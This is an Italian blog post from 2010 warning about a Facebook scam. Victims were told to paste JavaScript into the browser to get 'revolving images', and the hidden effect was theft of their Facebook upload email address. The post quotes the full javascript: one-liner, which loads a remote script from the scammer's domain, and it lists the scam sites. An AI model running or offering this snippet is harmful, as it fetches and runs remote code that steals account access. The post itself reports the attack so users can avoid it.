martedì 30 novembre 2010

Scam su Facebook per rubare la email di caricamento mobile


F-Secure, leader globale nell'offerta di soluzioni di sicurezza informatica, ha individuato una nuova ondata di short Url fraudolenti che da Facebook riportano a siti esterni. La nuova truffa si sta diffondendo tramite Facebook attraverso l'uso di frammenti di codice javascript, che gli utenti sono invitati ad inserire nel browser di navigazione, per ottenere le immagini girevoli su Facebook.

Oggi, gli utenti di Internet trascorrono più tempo sui social network di quanto non ne dedichino alle email. Gli spammer lo sanno e hanno adottato alcuni metodi per agire di conseguenza. Facebook ha recentemente preso provvedimenti per eliminare lo spam, tra cui azioni legali nei confronti di presunti spammer e miglioramenti al sito, come la possibilità di segnalare lo spam e il filtro antispam per le pagine aziendali, ma questi strumenti sembrano essere ancora insufficienti nella lotta contro lo spam. Entrati su Facebook, infatti, ed utilizzando il termine di ricerca "omg http://" visualizziamo un elenco di post degli utenti:


Il procedimento per truffare l'utente è relativamente semplice. Gli utenti sono invitati ad inserire nel browser di navigazione un codice javascript, per ottenere delle immagini girevoli su Facebook. Tutto quello che bisogna fare è copiare ed incollare il seguente pezzo di codice JavaScript
"javascript:(a = (b = document).createElement("script")).src = "//imagemajic.info/majic.js?show", b.body.appendChild(a); void(0)"
nel browser. Mentre si ricevono delle immagini a caso girevoli dei propri amici, in sottofondo la sceneggiatura va a rilevare la vostra "Email Address Upload", cioè la vostra email di caricamento personalizzata, utilizzata per pubblicare aggiornamenti di stato o inviare foto e video al vostro profilo.


Anche se il danno è ancora limitato, Aditya Punjani, uno sviluppatore, ha illustrato il codice che dimostra come il nuovo exploit è in grado di produrre danni maggiori. Mentre questa truffa non sembra generare degli enormi danni, limitandosi agli aggiornamenti di status degli utenti, questa potrebbe evolversi nel tempo in una truffa ben più grande. Facebook stesso raccomanda di non condividere la email personalizzata con altri, inoltre ricordate che le foto e i video caricati via e-mail sono visibili a tutti per impostazione predefinita. In questo momento la truffa si propaga attraverso i seguenti siti: http://revolvingimages.info/fb/, http://kewlpics.tk/, http://itsmajic.tk/


Offrendo alle persone uno strumento semplice per restare in contatto con parenti e amici, Facebook è diventato rapidamente il più importante social network al mondo. Proporzionalmente è cresciuto lo spam sui social network. Gli short Url sono stati già in passato utilizzati per campagne di spam, che vengono condivisi istantaneamente con tutti gli amici. Staremo a vedere come si evolverà questa nuova truffa. Nel frattempo assicuratevi di non fare clic su uno degli short Url che offrono le "immagini di Facebook girevoli" e prestate attenzione ai codici Javascript che vi vengono proposti, per ottenere funzionalità nascoste o particolari su Facebook.

Nessun commento:

Posta un commento